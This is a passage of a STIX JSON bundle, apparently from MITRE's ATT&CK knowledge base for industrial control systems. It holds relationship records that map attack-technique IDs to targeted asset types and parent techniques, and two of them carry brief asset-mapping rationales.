"relationship--14c73603-a6d2-4a8d-9904-0f8249aaa495", "created": "2023-09-29T16:40:06.079Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:40:06.079Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15377914-bf08-4c7e-ab00-1e272e2f3c1a", "created": "2023-09-28T19:47:25.303Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:47:25.303Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15665bbf-2c42-4232-a5c1-b01ffea13041", "created": "2020-01-24T13:51:01.423Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--159fb736-ba92-4564-aa6d-db6f64497763", "created": "2023-09-28T20:25:59.717Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:25:59.717Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15fb0728-9973-4ce4-b0d9-2c177be952c7", "created": "2020-02-21T21:00:49.032Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--162772ee-960e-4b14-9c90-0d86ef3e5cf8", "created": "2020-01-30T18:42:08.533Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a", "target_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1628074c-99e3-42b3-bea9-85c7fe6a6bb8", "created": "2020-01-24T15:11:03.012Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16ac0172-02d1-4fda-99c0-61f1cef7dc4b", "created": "2023-09-28T20:06:03.889Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:06:03.889Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16b74b29-e3b3-49ff-9ff4-cd7ade0f8ff4", "created": "2023-09-29T18:48:52.853Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:48:52.853Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16c7240e-0559-4c49-9003-1bfe97074252", "created": "2024-04-09T21:02:28.446Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T21:02:28.446Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16f472ba-e66d-4317-bb52-b9e3ce76b37b", "created": "2019-12-12T15:08:21.109Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1713622d-f3fa-4ec4-b63a-3d2a75c23398", "created": "2020-02-21T21:08:33.353Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1736df4d-188e-4a44-a8b3-6c6cd71dc749", "created": "2023-09-29T17:05:30.498Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:05:30.498Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--17d5794d-dcd5-4e0f-87e4-87d41c24b5fa", "created": "2023-10-02T20:18:01.546Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:18:01.546Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--17fd7ffd-63d9-4e1e-8b19-38095b2d65ab", "created": "2023-09-29T17:45:45.485Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:45:45.485Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1865830b-511d-4302-99f7-6143647a8e40", "created": "2023-10-02T20:23:52.339Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:23:52.339Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--18a86d7f-ebe0-4dd7-a5e0-f049c884b607", "created": "2020-02-11T18:38:56.281Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--18af193c-160a-4cae-9078-4d69de5c2347", "created": "2023-09-29T18:56:21.340Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:56:21.340Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--18cdfacf-4eba-4049-b85f-d1cab5106c75", "created": "2023-09-29T18:02:01.822Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:02:01.822Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19357ea1-2e21-4e35-a99e-3e3cf3321e89", "created": "2023-02-21T20:46:57.248Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-02-21T20:46:57.248Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--155207c0-7f53-4f13-a06b-0a9907ef5096", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--193fda36-9c40-47dd-b6e5-4fed75d7e844", "created": "2020-02-11T19:05:02.497Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19ae270d-686b-4c13-94c9-ade20e57556c", "created": "2020-03-13T21:04:13.665Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--f2d44246-91f1-478a-b6c8-1227e0ca109d", "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19df16da-8247-45ef-be13-ba58b1fb9c1c", "created": "2023-09-28T20:11:23.956Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:11:23.956Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19e9b914-3cb9-430c-ae02-f8e93fc2d826", "created": "2023-09-28T21:13:49.529Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:13:49.529Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19ed775b-d3cb-48ec-916a-c26e7539ccc6", "created": "2020-02-20T14:31:35.072Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a3ecee5-0237-4e01-8f02-90092c15a2f0", "created": "2023-10-02T20:18:45.122Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:18:45.122Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a7714b6-4ae9-4ea5-83a0-00595621273b", "created": "2024-05-22T15:23:00.881Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:23:00.881Z", "description": "Asset Mapping Rationale: Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. Adversaries can use the network CLI to change how network devices behave and operate.", "relationship_type": "targets", "source_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a900ac4-c150-4b57-a899-990854b01d4b", "created": "2023-09-29T16:33:50.423Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:33:50.423Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a96ad0d-84df-4b6b-ba4c-8559de5ec356", "created": "2023-09-29T18:57:45.950Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-23T21:59:34.492Z", "description": "Asset Mapping Rationale: Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network.", "relationship_type": "targets", "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a9ca148-a456-4b66-805f-a2bdfc7a947d", "created": "2023-09-28T20:09:21.736Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:09:21.736Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1af12953-edeb-4678-91e4-7c70000ee6c3", "created": "2020-02-20T22:10:20.630Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1af5c5bb-0d97-4c0a-9174-4dee1ff8b185", "created": "2023-09-29T18:01:06.725Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:01:06.725Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b7c7b5c-22df-4713-be96-818a8916e6d1", "created": "2020-10-15T02:59:38.710Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b94c927-0445-4ed8-80f1-7b31418f60b5", "created": "2023-09-29T17:43:41.332Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:43:41.332Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1ba485c9-951e-4e07-8e69-1d0efc372f6b", "created": "2023-09-29T16:41:44.745Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:41:44.745Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1bccb381-1d71-4c9a-8785-2ada562234f2", "created": "2020-03-13T20:36:57.505Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1bea0610-432c-4cd7-8e0e-8b7bbd09d738", "created": "2023-09-29T18:00:32.581Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:00:32.581Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1c7df4f1-cee5-42c6-a974-29552552666f", "created": "2023-09-28T19:47:08.952Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:47:08.952Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": 